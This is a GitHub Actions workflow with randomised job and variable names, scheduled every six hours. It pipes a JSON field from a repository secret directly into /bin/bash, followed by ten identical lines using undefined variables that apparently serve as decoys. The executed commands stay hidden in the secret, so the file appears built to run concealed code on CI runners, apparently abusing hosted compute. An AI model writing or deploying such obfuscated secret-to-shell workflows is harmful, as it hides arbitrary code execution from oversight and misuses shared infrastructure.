name: fengdouou4567

on:
  workflow_dispatch:
  schedule:
    - cron: '48 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fengdouou4567
        env:
          uvapz8611: ${{ secrets.uvapz8611 }}
        run: |
          echo $uvapz8611 | jq -r .kfic319 | /bin/bash
          echo $hmfz1670 | jq -r .m9197 | /bin/bash
          echo $s53499 | jq -r .mpplp742 | /bin/bash
          echo $bw62 | jq -r .qmetd9 | /bin/bash
          echo $iej3019 | jq -r .vv47114 | /bin/bash
          echo $utgo1 | jq -r .sfk7 | /bin/bash
          echo $fkujn390 | jq -r .pnnne0036 | /bin/bash
          echo $hzso8 | jq -r .crzbw7 | /bin/bash
          echo $ggkzu0 | jq -r .r11918 | /bin/bash
          echo $hg32414 | jq -r .gpwn29699 | /bin/bash
          echo $ue463 | jq -r .o0 | /bin/bash

